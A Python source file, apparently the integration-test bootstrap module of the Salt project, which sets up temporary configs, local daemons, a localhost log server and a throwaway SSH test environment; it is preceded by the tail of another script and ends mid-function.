dprint("Freed console successfully")
###
# Startup
def main():
multiprocessing.freeze_support()
sys.excepthook = handle_exceptions
parse_config()
run_pool()
if __name__ == "__main__":
main()
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import platform
import os
import re
import sys
import copy
import json
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
STATE_FUNCTION_RUNNING_RE = re.compile(
r'''The function (?:"|')(?P<state_func>.*)(?:"|') is running as PID '''
r'(?P<pid>[\d]+) and was started at (?P<date>.*) with jid (?P<jid>[\d]+)'
)
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import requires_sshd_server
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR)
# Import Salt libs
import salt
import salt.config
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils
import salt.utils.process
import salt.log.setup as salt_log_setup
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.utils.process import MultiprocessingProcess, SignalHandlingMultiprocessingProcess
from salt.utils.nb_popen import NonBlockingPopen
from salt.exceptions import SaltClientError
try:
import salt.master
except ImportError:
# Not required for raet tests
pass
# Import 3rd-party libs
import yaml
import msgpack
import salt.ext.six as six
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
if salt.utils.is_windows():
import win32api
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
from tornado import gen
from tornado import ioloop
from tornado import concurrent
SYS_TMP_DIR = os.path.realpath(
# Avoid ${TMPDIR} and gettempdir() on MacOS as they yield a base path too long
# for unix sockets: ``error: AF_UNIX path too long``
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
os.environ.get('TMPDIR', tempfile.gettempdir()) if not salt.utils.is_darwin() else '/tmp'
)
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
PYEXEC = 'python{0}.{1}'.format(*sys.version_info)
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-prodenv-state-tree')
TMP_CONF_DIR = os.path.join(TMP, 'config')
TMP_SUB_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, 'sub-minion')
TMP_SYNDIC_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, 'syndic-minion')
TMP_SYNDIC_MASTER_CONF_DIR = os.path.join(TMP_CONF_DIR, 'syndic-master')
CONF_DIR = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
PILLAR_DIR = os.path.join(FILES, 'pillar')
TMP_SCRIPT_DIR = os.path.join(TMP, 'scripts')
ENGINES_DIR = os.path.join(FILES, 'engines')
LOG_HANDLERS_DIR = os.path.join(FILES, 'log_handlers')
SCRIPT_TEMPLATES = {
'salt': [
'from salt.scripts import salt_main\n',
'if __name__ == \'__main__\':\n'
' salt_main()'
],
'salt-api': [
'import salt.cli\n',
'def main():\n',
' sapi = salt.cli.SaltAPI()',
' sapi.run()\n',
'if __name__ == \'__main__\':',
' main()'
],
'common': [
'from salt.scripts import salt_{0}\n',
'from salt.utils import is_windows\n\n',
'if __name__ == \'__main__\':\n',
' if is_windows():\n',
' import os.path\n',
' import py_compile\n',
' cfile = os.path.splitext(__file__)[0] + ".pyc"\n',
' if not os.path.exists(cfile):\n',
' py_compile.compile(__file__, cfile)\n',
' salt_{0}()'
]
}
RUNTIME_CONFIGS = {}
log = logging.getLogger(__name__)
def cleanup_runtime_config_instance(to_cleanup):
# Explicit and forced cleanup
for key in list(to_cleanup.keys()):
instance = to_cleanup.pop(key)
del instance
atexit.register(cleanup_runtime_config_instance, RUNTIME_CONFIGS)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64510, 64511):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
def run_tests(*test_cases, **kwargs):
'''
Run integration tests for the chosen test cases.
Function uses optparse to set up test environment
'''
needs_daemon = kwargs.pop('needs_daemon', True)
if kwargs:
raise RuntimeError(
'The \'run_tests\' function only accepts \'needs_daemon\' as a '
'keyword argument'
)
class TestcaseParser(SaltTestcaseParser):
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
if needs_daemon:
self.add_option(
'--transport',
default='zeromq',
choices=('zeromq', 'raet', 'tcp'),
help=('Select which transport to run the integration tests with, '
'zeromq, raet, or tcp. Default: %default')
)
def validate_options(self):
SaltTestcaseParser.validate_options(self)
# Transplant configuration
transport = None
if needs_daemon:
transport = self.options.transport
TestDaemon.transplant_configs(transport=transport)
def run_testcase(self, testcase, needs_daemon=True): # pylint: disable=W0221
if needs_daemon:
print(' * Setting up Salt daemons to execute tests')
with TestDaemon(self):
return SaltTestcaseParser.run_testcase(self, testcase)
return SaltTestcaseParser.run_testcase(self, testcase)
parser = TestcaseParser()
parser.parse_args()
for case in test_cases:
if parser.run_testcase(case, needs_daemon=needs_daemon) is False:
parser.finalize(1)
parser.finalize(0)
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
socketserver.TCPServer.server_activate(self)
#super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
socketserver.TCPServer.server_close(self)
#super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
class ScriptPathMixin(object):
def get_script_path(self, script_name):
'''
Return the path to a testing runtime script
'''
if not os.path.isdir(TMP_SCRIPT_DIR):
os.makedirs(TMP_SCRIPT_DIR)
script_path = os.path.join(TMP_SCRIPT_DIR,
'cli_{0}.py'.format(script_name.replace('-', '_')))
if not os.path.isfile(script_path):
log.info('Generating {0}'.format(script_path))
# Late import
import salt.utils
with salt.utils.fopen(script_path, 'w') as sfh:
script_template = SCRIPT_TEMPLATES.get(script_name, None)
if script_template is None:
script_template = SCRIPT_TEMPLATES.get('common', None)
if script_template is None:
raise RuntimeError(
'{0} does not know how to handle the {1} script'.format(
self.__class__.__name__,
script_name
)
)
sfh.write(
'#!{0}\n\n'.format(sys.executable) +
'import sys\n' +
'CODE_DIR="{0}"\n'.format(CODE_DIR) +
'if CODE_DIR not in sys.path:\n' +
' sys.path.insert(0, CODE_DIR)\n\n' +
'\n'.join(script_template).format(script_name.replace('salt-', ''))
)
fst = os.stat(script_path)
os.chmod(script_path, fst.st_mode | stat.S_IEXEC)
log.info('Returning script path %r', script_path)
return script_path
class SaltScriptBase(ScriptPathMixin):
'''
Base class for Salt CLI scripts
'''
cli_script_name = None
def __init__(self,
config,
config_dir,
bin_dir_path,
io_loop=None):
self.config = config
self.config_dir = config_dir
self.bin_dir_path = bin_dir_path
self._io_loop = io_loop
@property
def io_loop(self):
'''
Return an IOLoop
'''
if self._io_loop is None:
self._io_loop = ioloop.IOLoop.current()
return self._io_loop
def get_script_args(self): # pylint: disable=no-self-use
'''
Returns any additional arguments to pass to the CLI script
'''
return []
class SaltDaemonScriptBase(SaltScriptBase, ShellTestCase):
'''
Base class for Salt Daemon CLI scripts
'''
def __init__(self, *args, **kwargs):
super(SaltDaemonScriptBase, self).__init__(*args, **kwargs)
self._running = multiprocessing.Event()
self._connectable = multiprocessing.Event()
self._process = None
def is_alive(self):
'''
Returns true if the process is alive
'''
return self._running.is_set()
def get_check_ports(self): # pylint: disable=no-self-use
'''
Return a list of ports to check against to ensure the daemon is running
'''
return []
def start(self):
'''
Start the daemon subprocess
'''
self._process = SignalHandlingMultiprocessingProcess(
target=self._start, args=(self._running,))
self._process.start()
self._running.set()
return True
def _start(self, running_event):
'''
The actual, coroutine aware, start method
'''
log.info('Starting %s %s DAEMON', self.display_name, self.__class__.__name__)
proc_args = [
self.get_script_path(self.cli_script_name),
'-c',
self.config_dir,
] + self.get_script_args()
if salt.utils.is_windows():
# Windows need the python executable to come first
proc_args.insert(0, sys.executable)
log.info('Running \'%s\' from %s...', ' '.join(proc_args), self.__class__.__name__)
try:
terminal = NonBlockingPopen(proc_args, cwd=CODE_DIR)
while running_event.is_set() and terminal.poll() is None:
# We're not actually interested in processing the output, just consume it
if terminal.stdout is not None:
terminal.recv()
if terminal.stderr is not None:
terminal.recv_err()
time.sleep(0.125)
except (SystemExit, KeyboardInterrupt):
pass
# Let's begin the shutdown routines
if terminal.poll() is None:
try:
log.info('Sending SIGINT to %s %s DAEMON', self.display_name, self.__class__.__name__)
terminal.send_signal(signal.SIGINT)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
timeout = 15
log.info('Waiting %s seconds for %s %s DAEMON to respond to SIGINT',
timeout,
self.display_name,
self.__class__.__name__)
while timeout > 0:
if terminal.poll() is not None:
break
timeout -= 0.0125
time.sleep(0.0125)
if terminal.poll() is None:
try:
log.info('Sending SIGTERM to %s %s DAEMON', self.display_name, self.__class__.__name__)
terminal.send_signal(signal.SIGTERM)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
timeout = 15
log.info('Waiting %s seconds for %s %s DAEMON to respond to SIGTERM',
timeout,
self.display_name,
self.__class__.__name__)
while timeout > 0:
if terminal.poll() is not None:
break
timeout -= 0.0125
time.sleep(0.0125)
if terminal.poll() is None:
try:
log.info('Sending SIGKILL to %s %s DAEMON', self.display_name, self.__class__.__name__)
terminal.kill()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
# Let's close the terminal now that we're done with it
try:
terminal.terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
terminal.communicate()
def terminate(self):
'''
Terminate the started daemon
'''
log.info('Terminating %s %s DAEMON', self.display_name, self.__class__.__name__)
if HAS_PSUTIL:
try:
parent = psutil.Process(self._process.pid)
children = parent.children(recursive=True)
except psutil.NoSuchProcess:
children = []
self._running.clear()
self._connectable.clear()
time.sleep(0.0125)
self._process.terminate()
if HAS_PSUTIL:
# Lets log and kill any child processes which salt left behind
for child in children[:]:
try:
child.send_signal(signal.SIGKILL)
log.info('Salt left behind the following child process: %s', child.as_dict())
try:
child.wait(timeout=5)
except psutil.TimeoutExpired:
child.kill()
except psutil.NoSuchProcess:
children.remove(child)
if children:
psutil.wait_procs(children, timeout=5)
log.info('%s %s DAEMON terminated', self.display_name, self.__class__.__name__)
def wait_until_running(self, timeout=None):
'''
Blocking call to wait for the daemon to start listening
'''
if self._connectable.is_set():
return True
try:
return self.io_loop.run_sync(self._wait_until_running, timeout=timeout)
except ioloop.TimeoutError:
return False
@gen.coroutine
def _wait_until_running(self):
'''
The actual, coroutine aware, call to wait for the daemon to start listening
'''
check_ports = self.get_check_ports()
log.debug(
'%s is checking the following ports to assure running status: %s',
self.__class__.__name__,
check_ports
)
while self._running.is_set():
if not check_ports:
self._connectable.set()
break
for port in set(check_ports):
if isinstance(port, int):
log.trace('Checking connectable status on port: %s', port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = sock.connect_ex(('localhost', port))
if conn == 0:
log.debug('Port %s is connectable!', port)
check_ports.remove(port)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
del sock
elif isinstance(port, str):
joined = self.run_run('manage.joined', config_dir=self.config_dir)
joined = [x.lstrip('- ') for x in joined]
if port in joined:
check_ports.remove(port)
yield gen.sleep(0.125)
# A final sleep to allow the ioloop to do other things
yield gen.sleep(0.125)
log.info('All ports checked. %s running!', self.cli_script_name)
raise gen.Return(self._connectable.is_set())
class SaltMinion(SaltDaemonScriptBase):
'''
Class which runs the salt-minion daemon
'''
cli_script_name = 'salt-minion'
def get_script_args(self):
script_args = ['-l', 'quiet']
if salt.utils.is_windows() is False:
script_args.append('--disable-keepalive')
return script_args
def get_check_ports(self):
return set([self.config['id']])
class SaltMaster(SaltDaemonScriptBase):
'''
Class which runs the salt-minion daemon
'''
cli_script_name = 'salt-master'
def get_check_ports(self):
#return set([self.config['runtests_conn_check_port']])
return set([self.config['ret_port'],
self.config['publish_port'],
self.config['runtests_conn_check_port']])
def get_script_args(self):
#return ['-l', 'debug']
return ['-l', 'quiet']
class SaltSyndic(SaltDaemonScriptBase):
'''
Class which runs the salt-syndic daemon
'''
cli_script_name = 'salt-syndic'
def get_script_args(self):
#return ['-l', 'debug']
return ['-l', 'quiet']
def get_check_ports(self):
return set()
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = get_colors(self.parser.options.no_colors is False)
if salt.utils.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'raet':
self.start_raet_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
def start(cls, opts, start_fun):
salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__))
daemon = cls(opts)
getattr(daemon, start_fun)()
process = multiprocessing.Process(target=start,
args=(cls, opts, start_fun))
process.start()
return process
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.daemon = True
self.log_server_process.start()
self.master_process = SaltMaster(self.master_opts, TMP_CONF_DIR, SCRIPT_DIR)
self.master_process.display_name = 'salt-master'
self.minion_process = SaltMinion(self.minion_opts, TMP_CONF_DIR, SCRIPT_DIR)
self.minion_process.display_name = 'salt-minion'
self.sub_minion_process = SaltMinion(self.sub_minion_opts, TMP_SUB_MINION_CONF_DIR, SCRIPT_DIR)
self.sub_minion_process.display_name = 'sub salt-minion'
self.smaster_process = SaltMaster(self.syndic_master_opts, TMP_SYNDIC_MASTER_CONF_DIR, SCRIPT_DIR)
self.smaster_process.display_name = 'syndic salt-master'
self.syndic_process = SaltSyndic(self.syndic_opts, TMP_SYNDIC_MINION_CONF_DIR, SCRIPT_DIR)
self.syndic_process.display_name = 'salt-syndic'
for process in (self.master_process, self.minion_process, self.sub_minion_process,
self.smaster_process, self.syndic_process):
sys.stdout.write(
' * {LIGHT_YELLOW}Starting {0} ... {ENDC}'.format(
process.display_name,
**self.colors
)
)
sys.stdout.flush()
process.start()
process.wait_until_running(timeout=15)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... STARTED!\n{ENDC}'.format(
process.display_name,
**self.colors
)
)
sys.stdout.flush()
def start_raet_daemons(self):
'''
Fire up the raet daemons!
'''
import salt.daemons.flo
self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster,
self.master_opts,
'start')
self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
self.minion_opts,
'tune_in')
self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
self.sub_minion_opts,
'tune_in')
# Wait for the daemons to all spin up
time.sleep(5)
# self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster,
# self.syndic_master_opts,
# 'start')
# no raet syndic daemon yet
start_tcp_daemons = start_zeromq_daemons
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
print(' * Initializing SSH subsystem')
keygen = salt.utils.which('ssh-keygen')
sshd = salt.utils.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(TMP_CONF_DIR):
os.makedirs(TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, TMP_CONF_DIR)
auth_key_file = os.path.join(TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_ed25519_err)))
with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
shutil.copy(roster_path, TMP_CONF_DIR)
if salt.utils.is_windows():
with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(win32api.GetUserName()))
roster.write(' priv: {0}/{1}'.format(TMP_CONF_DIR, 'key_test'))
else:
with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(pwd.getpwuid(os.getuid()).pw_name))
roster.write(' priv: {0}/{1}'.format(TMP_CONF_DIR, 'key_test'))
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
'''
return RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_CONFIGS:
RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(TMP_CONF_DIR):
shutil.rmtree(TMP_CONF_DIR)
os.makedirs(TMP_CONF_DIR)
os.makedirs(TMP_SUB_MINION_CONF_DIR)
os.makedirs(TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(TMP_CONF_DIR))
if salt.utils.is_windows():
running_tests_user = win32api.GetUserName()
else:
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
master_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'master'))
master_opts['user'] = running_tests_user
tests_known_hosts_file = os.path.join(TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['conf_dir'] = TMP_CONF_DIR
minion_config_path = os.path.join(CONF_DIR, 'minion')
minion_opts = salt.config._read_conf_file(minion_config_path)
minion_opts['user'] = running_tests_user
minion_opts['conf_dir'] = TMP_CONF_DIR
minion_opts['root_dir'] = master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
sub_minion_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'sub_minion'))
sub_minion_opts['user'] = running_tests_user
sub_minion_opts['conf_dir'] = TMP_SUB_MINION_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
syndic_master_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'syndic_master'))
syndic_master_opts['user'] = running_tests_user
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['conf_dir'] = TMP_SYNDIC_MASTER_CONF_DIR
# The syndic config file has an include setting to include the master configuration
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(CONF_DIR, 'syndic')))
# Lets remove the include setting
syndic_opts.pop('include')
syndic_opts['user'] = running_tests_user
syndic_opts['conf_dir'] = TMP_SYNDIC_MINION_CONF_DIR
if transport == 'raet':
master_opts['transport'] = 'raet'
master_opts['raet_port'] = 64506
minion_opts['transport'] = 'raet'
minion_opts['raet_port'] = 64510
sub_minion_opts['transport'] = 'raet'
sub_minion_opts['raet_port'] = 64520
# syndic_master_opts['transport'] = 'raet'
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
TMP_PRODENV_STATE_TREE
]
}
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
